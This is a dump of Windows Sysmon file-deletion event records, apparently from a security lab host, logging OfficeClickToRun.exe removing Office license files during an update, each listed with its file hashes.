14:55:14.189{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\Outlook2019VL_KMS_Client_AE-ppd.xrm-msMD5=AF08558F402561540A8CD87700F93FD1,SHA256=18E4C4B4CB6FCBDCAA2737EFE45B27A3A3EE456D2362177BFE011F915842C81B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067392Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.189{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\Outlook2019R_Trial-ul-oob.xrm-msMD5=0D07C8861A97FEE4A573F3BEF5F79E43,SHA256=D32508FBF77A447CB9F899313259561716F08535E187FFB215381B1DF9AA4B62,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067391Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.189{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\Outlook2019R_Trial-ppd.xrm-msMD5=0F3E0A11CCF9E9A72D2BC28C5235C7C3,SHA256=D1C1EF30CE741BE6A253C9E7817BC9DF70FDE2EAA07C8077023C6FE988864EFB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067390Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.189{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\Outlook2019R_Trial-pl.xrm-msMD5=3029D47779789684089B432AF4CD9B25,SHA256=9C1889E2F75A11A662029DE5C3DCA578D93978BFA54188A28E09F47E962DCB3E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067389Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.189{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\Outlook2019R_Retail-ul-phn.xrm-msMD5=203C66BC46C974224CEF9214F0FD87D3,SHA256=AB9B28F2D3C5504DE3D2D27C9E7635CC74729EE191B3CFE467A2076F1E7FC95D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067388Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.189{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\Outlook2019R_Retail-ul-oob.xrm-msMD5=3650223FB5BB0A0C47D56FE678CE298F,SHA256=ABA4D7ED7E603F9EA196D3261F88521D7146F5C1B9E4610482A5BD978DC99428,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067387Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.173{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\Outlook2019R_Retail-ppd.xrm-msMD5=6EE16CFD109ABAB1FBC38AC0F00FF4DE,SHA256=AB8E09226CF8AEA0840706C8B5F1C92B125240F32470B64E696231231B050C42,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067386Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.173{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\Outlook2019R_Retail-pl.xrm-msMD5=998498F8DCA946DAFF71DFA12D099169,SHA256=36A7C2C09FB7FA9CF8C03D67FA02175FBC0113C5A09D9E79669D85FE617DC804,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067385Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.173{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\Outlook2019R_OEM_Perp-ul-phn.xrm-msMD5=C690D900F8A7449C5E58DF797E789EF7,SHA256=D54FB4271368435016B3FE730F99FDCC3A6BC563990C56D754210702A4721972,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067384Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.173{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\Outlook2019R_OEM_Perp-ul-oob.xrm-msMD5=08FA4DD01723C5EEAFFF6D908541F8E4,SHA256=EB873ED1E46DC83CF9D5F684F82AB4B986C69D0BAE28A0484F15F1364D950887,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067383Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.173{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\Outlook2019R_OEM_Perp-ppd.xrm-msMD5=02567E02AAD02CF16980038105F95B98,SHA256=3AA39A34DF926527C331349EF7DC7087A4AC6EE361588E880392DCF945DDB861,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067382Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.173{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\Outlook2019R_OEM_Perp-pl.xrm-msMD5=667478EE30EA774121E7B362505EFC39,SHA256=61D6ABF04954EEC9145FD345E5C5714E2758FB0DA267850BB056FFE89C4CE564,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067381Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.173{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\Outlook2019R_Grace-ul-oob.xrm-msMD5=CE3AAAA879B20FA6FD0A69CF47305D45,SHA256=93F709FBD5349B7F24695756C1EA86260D82ACF70E85ED8B9E9FD933828577C1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067380Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.173{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\Outlook2019R_Grace-ppd.xrm-msMD5=1EA53FCBA251C2FB31941E2F8AEE1061,SHA256=A3E32CB39F1693E49EB1CE400B050B585450D0A4D7CE3DC2CD614A49CBCE4BD1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067379Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.173{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\OneNoteVL_MAK-ul-phn.xrm-msMD5=EA85419305623BB5D24E0D70E008EFEB,SHA256=D4D31892D82373249AEBB459FADADB2E82C9169A6AEE7EAB181202DA08BEE880,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067378Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.173{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\OneNoteVL_MAK-ul-oob.xrm-msMD5=FF4456ACE02E4B6CB3F2AA4A22592307,SHA256=9F715ACED9792D8162FF3AEBF3A9E51F3F3B40DF93C8CC525E0CEDE50557085B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067377Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.173{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\OneNoteVL_MAK-ppd.xrm-msMD5=F2415FD135F9E28B682EB93FF14FFF54,SHA256=C651D1B94E76EF7F4204C574F473F46F71F7756048F4049CE8F5700D7BEC76F8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067376Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.173{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\OneNoteVL_MAK-pl.xrm-msMD5=3979257A7AC746663806E2973B528385,SHA256=BF055BDF9F1C0217B90315ACA1EE1E346EF8EF049A108292DCA769BF1AEFBBC6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067375Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.173{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\OneNoteVL_KMS_Client-ul.xrm-msMD5=5E41FF200161E94BA359A8C725D35F85,SHA256=438E12F95F4F2A832891C9A0C26AF3FF2C89EB688AA497634F693ADEA7CBA7A0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067374Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.173{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\OneNoteVL_KMS_Client-ul-oob.xrm-msMD5=6DAB951710D2927C177DFFADA1293665,SHA256=525BBA6BAB4A01B0114EB477CB5D633DD6FBAFEF1B2CAC2B43A24FF5E1D506A0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067373Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.158{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\OneNoteVL_KMS_Client-ppd.xrm-msMD5=D4753129F457E704FAB99B6877A43416,SHA256=802C514B90CAF17AC79868C335665A2369443B6CE06582475C37B95C5453A2EE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067372Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.158{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\OneNoteR_Trial-ul-oob.xrm-msMD5=095C3763EEA1E798E4C3ADFBC565781A,SHA256=CC2A9A994306CEF63CEF9B23138BB94CC9031E228AA8DA84691F99AF1347CA25,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067371Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.158{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\OneNoteR_Trial-ppd.xrm-msMD5=629F62D6FE144048E9F2DE980138F901,SHA256=A16E9390FFB106081E4D82860ED8D2D0851BCC53376DCB3F16FC855A6260CB21,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067370Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.158{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\OneNoteR_Trial-pl.xrm-msMD5=4728F1102643D843D762D9CA6DAD5586,SHA256=1FE5C8CBFF6F93F0E0F6F0C37BFE52F1337EC7C18C1DD3F8647A2854E4DC1521,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067369Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.158{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\OneNoteR_Retail-ul-phn.xrm-msMD5=3A6BEAF9C1B512588223A813478B80DB,SHA256=E180BBD30A02E919A0566DE39493B7BA2F555579EE72A2E3F6EB4E3D91E438C3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067368Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.158{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\OneNoteR_Retail-ul-oob.xrm-msMD5=46B2E3425B184229B5D09E94E88EA61D,SHA256=094CD2DB444401D30CA010CA575B4CC2457C5F2975DE5DA15258EA0C30D84BA9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067367Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.158{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\OneNoteR_Retail-ppd.xrm-msMD5=C96127686387544E35DFDCC0A3459277,SHA256=22CB54FD8F02054D539F75F30F5CEDE6AEEA60EFBD92C2EA04C622CD23787CE4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067366Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.158{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\OneNoteR_Retail-pl.xrm-msMD5=F0D6E5D12E370E9ECCCF7F1350E5D0BA,SHA256=B91DEE9992C1226BF70A7446451E1C34D2F23F56D464538A7AA019FBDA19196C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067365Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.158{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\OneNoteR_OEM_Perp-ul-phn.xrm-msMD5=4BCCA4E0AD22E99864B95D93980F8347,SHA256=A701951930246B52FBA1C23AAF4B400DEAB613B07830A9B8A00E312470D2A6E5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067364Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.158{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\OneNoteR_OEM_Perp-ul-oob.xrm-msMD5=2A5CDB02B468F3ECDD023402628276F0,SHA256=B732745DE3EF1598F65BA11B8F7B4E83F8C4A48D4476E5ACFD06797C0ECD244C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067363Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.158{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\OneNoteR_OEM_Perp-ppd.xrm-msMD5=E8AE619AF1D8DFF61FB0CD150C5B051A,SHA256=0193257CB126C92EF4BE2F4EB60C8D0183504F5D602F07F1E4409CDCCEDA2EEA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067362Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.158{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\OneNoteR_OEM_Perp-pl.xrm-msMD5=042B8047C44C6DB0C09D3449D36C12A8,SHA256=FE518950D1F893C6AF9FCA8B35F190FF097875AE6C90E0FC381F8201621739DE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067361Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.158{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\OneNoteR_Grace-ul-oob.xrm-msMD5=2B505C1A7F3400B4EAEC9B3FBCAD3630,SHA256=8B66DF398551E3E76F6E4B0E62B0D739B82FC522DF86DC29207A6D95155F63CC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067360Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.158{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\OneNoteR_Grace-ppd.xrm-msMD5=CB7398B720C6E9394A13D637F456E921,SHA256=6C7E8F6F3973AB5D1B3BC4892A9839500DEF2C27463360913F9D6DBC66A5C4D2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067359Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.142{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\OneNoteFreeR_Bypass-ul-oob.xrm-msMD5=5D2EA7BF89FB7B773ECF64F234020339,SHA256=FBF14A00B9D08E7DFFD02E606D994E802362EB81F92F8926F38E89DD53142071,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067358Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.142{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\OneNoteFreeR_Bypass-ppd.xrm-msMD5=0EBAC719EBA89AB5608D73345684E401,SHA256=44B4F4BD8F749FA16C103F0FB77FFCF160D628B9B128C6C9B4F1AE1C37AEBA27,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067357Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.142{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\O365SmallBusPremR_SubTrial5-ul-oob.xrm-msMD5=514CFEA79E4C528A41A6257CF9763B02,SHA256=91D99E70E022275BAF0707F394BB1E936BACC48C9748E512151D55E9634A9889,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067356Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.142{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\O365SmallBusPremR_SubTrial5-ppd.xrm-msMD5=1E768AEEE9F2E052279916AA64E23FE1,SHA256=3178D3788A08B621DBE4CA0D70B68C7C7CBF6A527217B5596E82362090F4F9B1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067355Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.142{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\O365SmallBusPremR_SubTrial5-pl.xrm-msMD5=D1F46A09A50928710513DCDAFBD34238,SHA256=5C402242043D17CFFC60C92F7E4B7009CB7B8C8720F8BD5CED08549CEF3129C8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067354Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.142{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\O365SmallBusPremR_SubTrial4-ul-oob.xrm-msMD5=F4E559CC806F2B0004540115C5E4BE72,SHA256=30966634FED328E6B3A7A87C1F49D399AB5D33A0E45AB7B325A73B779BB94998,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067353Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.142{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\O365SmallBusPremR_SubTrial4-ppd.xrm-msMD5=79CFC8FF17B96DD41F210C6042988A8A,SHA256=2CC1A5A5431D773755DD0691621733A8229DCA3A5E417F286FB621078BE96584,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067352Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.142{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\O365SmallBusPremR_SubTrial4-pl.xrm-msMD5=38AF4EA628D5AF649540A1D5B993C148,SHA256=3B1D2672218828D40C2430D0EE266F62111504257B7BA3EF3D4DEBED7BDC7F8B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067351Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.142{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\O365SmallBusPremR_SubTrial3-ul-oob.xrm-msMD5=EFC2131CAD40BD3FFC091229618BCAB3,SHA256=07E7001ADECFB07E39FDCFAE25639B52F54B7FBB4734AC1E81D556D18F398B8A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067350Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.142{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\O365SmallBusPremR_SubTrial3-ppd.xrm-msMD5=22A30FAC30610DF684A9A917A289369C,SHA256=625B6D6F6EB63645371210BE09F6FC2D79BDBFA51C7CD4C88DF6028C5F4F509C,IMPHASH=00000000000000000000000000000000falsetrue 